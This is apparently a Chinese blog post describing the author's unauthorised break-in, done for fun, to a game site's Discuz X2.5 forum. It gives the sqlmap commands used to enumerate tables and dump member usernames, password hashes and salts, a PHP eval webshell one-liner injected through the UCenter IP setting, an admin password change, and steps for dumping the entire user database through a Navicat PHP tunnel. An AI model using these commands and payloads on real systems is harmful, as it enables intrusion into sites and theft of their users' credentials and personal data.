一次入侵Discuz小记

1
3,015

今天闲着无聊,然后朋友发来一张图,不要在意美元符号的艺术型打码这些细节。。。

无聊的很,打开看了下,是个游戏站,突然心里痒痒的,反正无聊,正好搞搞打发下时间

于是乎,操刀上sqlmap 

sqlmap.py -u http://Evil0x.com/?action=detail&id=2292

数据卡库类型

[17:00:15] [INFO] the back-end DBMS is MySQL

web application technology: Nginx

back-end DBMS: MySQL 5.0.12


果断列出数据库列表

sqlmap.py -u "http://Evil0x.com/?action=detail&id=2292" –dbs

一共有。。。12个。。。 

看了下表的数量,懒癌发作,不知从何下手,于是又看了下主站和旁注,有个主站游戏站,发现有个论坛 


Bbs.Evil0x.com


心中大喜,看了下默认后台 discuz x2.5


一边心中回放星爷魔性笑声一边敲命令

sqlmap.py -u "http://Evil0x.com/?action=detail&id=2292" –tables -D "相对应的表(***)"

然后。。。列了出以下的表。。。。


| bbs_common_block_favorite         |

| bbs_common_block_item             |

| bbs_common_block_permission       |

| bbs_common_block_pic              |

| bbs_common_block_style            |

| bbs_common_block_xml              |

| bbs_common_cache                  |

| bbs_common_card                   |

| bbs_common_card_log               |

| bbs_common_card_type              |

| bbs_common_connect_guest          |

.   .   .   .   .   .   .   .   .   . 

.   .此处省略一千行,真的是一千。。。.   .   .

.   .   .   .   .   .   .   .   .   .  

| pre_plus                          |

| pre_plustype                      |

| pre_remenyouxi                    |

| pre_user                          |

| pre_usergetpwdlog                 |

| pre_userpingtaibilog              |

| pre_userpingtaibilog_copy         |

| pre_userpingtaibilogtype          |

| pre_userplaygamelog               |

| pre_xinshoulibao                  |

| pre_z_card_record                 |

| pre_z_card_type                   |

| pre_z_charge_record               |

| pre_z_charge_username             |

| pre_z_game_card                   |

好吧。。。表。。。确实是很多。。。。。。顿时有种你丫不按套路出牌的感觉。。。。。

然后按照惯例找了7,8个member 和user表,果然不出我所料,都不是。。。。。。最后费了点功夫确定是bbs_ucenter_members

然后

sqlmap.py -u "http://Evil0x.com/?action=detail&id=2292" -D xxx -T bbs_ucenter_members –columns

列出bbs.ucenter_menber的列


列出账户密码:

sqlmap.py -u "http://Evil0x.com/?action=detail&id=2292" -D xxx -T bbs_ucenter_members –C username,password,salt –dump


列出账户

好,很好,非常好。管理和密码已经出来了,杀鸡焉用牛刀,果断收起sqlmap

http://bbs.Evil0x.com/?1 http://bbs.Evil0x.com/?2  http://bbs.Evil0x.com/?3  这个地方可以看到前3个都是管理员i帐号 


前2个虽然有salt,但是没法解密,然而第三个可以

Discuz x2.5 拿shell的方法 百度搜一下

直接在UCenter IP 地址(站长–ucenter设置):

里面插入一句话 

 xxoo\\’);eval($_POST[a])?>;// 

啪啪的~

但是问题又来了,由于不是创始人账户,无法进入uc设置   

所以试着改了下 admin**的密码 居然成功了 (以前有过一次类似的dz站经历,但是很遗憾,只有创始人可以更改admin密码)

星爷笑声再度响起,成功连上shell,但是,有了shell 我不满足,因为我要的小裤裤

试了很久,几百MB的东西就无法导出。。。所以试了一下navicat 不外连,百度了下,有没有一个适合 大型php mysql 脱裤脚本

不过既然我有了shell  可以通过navicat 进行连接

首先把navicat 下的这个php文件上传到 shell中

然后输入ip 、端口、账户密码参数

在http的通道中填写上传后的地址

然后在常规选项中选择本地

右键 sql文件就可以脱下某个表,脱的速度杠杠的!


但是。。。发现这样脱下来的表。。。不是很全 

对比下 昨天和今天拖得 差别很大。后来打开看了下,有些少。


于是问了下朋友,原来是选择sql的时候会丢失数据,所以为了能够获得一个完美的裤裤,请大家选择TXT文本格式

其实在实际操作中,并没有这样简单,有很多的小麻烦,在这里就不写出来了。


最后祝各位看官生活愉快!

Author:百里长苏